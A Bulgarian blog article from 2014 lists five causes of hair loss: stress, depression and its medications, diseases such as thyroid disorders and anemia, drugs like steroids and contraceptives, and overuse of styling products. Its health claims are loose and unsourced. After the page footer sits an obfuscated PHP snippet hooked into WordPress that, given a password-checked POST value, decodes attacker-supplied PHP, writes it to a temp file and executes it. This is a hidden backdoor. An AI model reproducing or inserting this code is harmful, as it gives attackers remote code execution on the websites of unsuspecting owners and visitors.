5 причини за косопад и оплешивяване | Косопад

5 причини за косопад и оплешивяване

В днешно време е нормално мъжете и жените да са често изложени на стресови ситуации. Обикновено са свързани с работата или със семейството. Въпреки че понякога тези ситуации са неизбежни, не означава, че трябва да търпим последиците им, сред които е и косопада.

kosopad-anemiya

1. Косопад заради стрес. Според последни изследвания, 50% от мъжете и жените, които са редовно изложени на стрес, страдат от косопад и оплешивяване, отколкото тези, които живеят спокойно и щастливо. Ако видите, че каналът в банята се задръства в косми, или по възглавницата ви остават кичури, трябва незабавно да вземете мерки.

2 . Косопад заради депресия. Може да причини загуба на коса заради стреса и тревожността. Тежката депресия дори може да причини възпаление на мозъка. Получава се заради завишеното производство на вещества във вътрешността наpleshiv-kosopad нервните пътища в мозъка.

Не само депресията, но и антидепресантите също могат да причинят сериозен косопад и дори оплешивяване, особено ако са по- тежки.

Някои от успокоителните лекарства пък забавят растежа на косата. Те се използват най- вече, за да успокоят хора с тревожно разстройство.

3 . Косопад заради заболявания. Някои болести водят до забавяне на растежа на косата, като тези, свързани с щитовидната жлеза, например. Също хората с анемия често страдат от косопад. Хора с определени автоимунни заболявания също могат да загубят косата си и пр.

4 . Косопад заради лекарства. Някои лекарства като страничен ефект могат да причинят косопад. Например, анаболни стероиди често водят до оплешивяване. Някои контрацептиви също могат да доведат до косопад.

5 . Косопад заради химически продукти. Ако прекаляваме с употребата на различни продукти за коса като гелове, спрейове, лакове и пр, малко по малко водим косата към увреждане, последвано от косопад.

24. май 2014 17:35:59 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}